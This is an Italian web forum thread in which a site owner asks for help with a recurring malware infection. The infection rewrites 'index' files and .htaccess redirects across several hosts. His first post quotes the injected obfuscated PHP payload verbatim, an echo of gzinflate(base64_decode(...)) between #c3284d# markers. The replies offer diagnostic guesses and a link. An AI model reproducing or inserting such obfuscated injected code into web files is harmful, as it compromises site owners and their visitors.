Malware Siti web

[elfocaotico]

Ciao,
gestisco alcuni siti internet e molti sono stati infettati.
Vengono modificati tutti i file nel cui nome è presente 'index' (ad esempio index.html, index_prodotti.php etc).
Tra l'altro su alcuni hosting viene anche scrito un file .htaccess che fa puntare i visitatori su altri siti.
In particolare negli scripts viengono aggiunte queste righe

#c3284d#
echo(gzinflate(base64_decode("3Y5BDsIgEEX3TXoHMpvq pkQXLrTgJbwApQhjKDR0sNrTi/YWzmry/583n7H/mG7WCSdi9J6MADIv4g/1VJsKsq6GqPNoArVLQjK7psN7UqNhc9ICHNF05rzP66p9nsmkN mWOodUWr4cTsFCiAm4LUvGAFWz0HoMVoDJFYD9WH9NgkoBQBOX RBgG6fPweOIPWkYAjsAUHct9NdnzrIJv9pa46vpWVHw==")));
#/c3284d#

Inserite soprattutto in scripts .php

Ho provato più volte a reimpostare la password ftp dell'hosting, a eseguire l'upload dei file 'puliti' (senza il malware) ed ho anche rimosso il file .htaccess ma dopo qualche ora tutto torna infettato.
Tra l'altro ho visto che il mio problema ce l'hanno anche tanti altri siti (non miei).

Sapete nulla?
Grazie

P.S.: ho diversi fornitori di hosting ed il problema si presenta su tutti

[Dascos]

Ciao,
per caso i siti sono fatti con un framework particolare (chessò, joomla, wordpress, ecc)? Magari è il framework che ha un baco e i soliti stupidi lo sfruttano a proprio favore. Questo lo penso perchè dici che ti si verifica anche su altri provider e lo noti anche su altri siti...

Ciao

[elfocaotico]

no no sono scritti di mio pugno.
Però anche a me è venuto il dubbio che si tratti di un problema legato ad un framwork tipo Joomla anche perchè tutti gli hosting che uso hanno la possibilità di utilizzarli.
Infatti a livello di script non ne riesco a venirne a capo

[MatCap83]

Originariamente inviato da elfocaotico
Ciao,
gestisco alcuni siti internet e molti sono stati infettati.
Vengono modificati tutti i file nel cui nome è presente 'index' (ad esempio index.html, index_prodotti.php etc).
Tra l'altro su alcuni hosting viene anche scrito un file .htaccess che fa puntare i visitatori su altri siti.
In particolare negli scripts viengono aggiunte queste righe [...]

Sembra che il problema sia piuttosto diffuso!

http://stopmalvertising.com/malware-...stats.php.html

[elfocaotico]

Scusate... ditemi se quel che faccio è corretto perchè sto a sbroccà

- Eseguo una scansione del pc e rimuovo eventuali Malware
- Cambio la password di accesso Ftp al sito infettato
- Eseguo l'upload dei files di backup non infetti
- Faccio la segnalazione a Google per ricontrollare il mio sito (da strumenti per webmaster)

Questa è la procedura che faccio di volta in volta ma puntualmente il malware mi si ripresenta.
E' normale? dipende da qlc che sbaglio io oppure il problema potrebbe anche essere dovuto al gestore dell'hosting?

Ultima domanda... i pc che devo scansionare in locale con un antivirus/antimalware devono essere solo quelli che accedono via ftp al sito o anche quelli che accedono con il backoffice? (cioè con il pannellino di gestione contenuti che ho scritto, tutto via http)

Non so più dove sbattere la capoccia

Grazie in anticipo per le dritte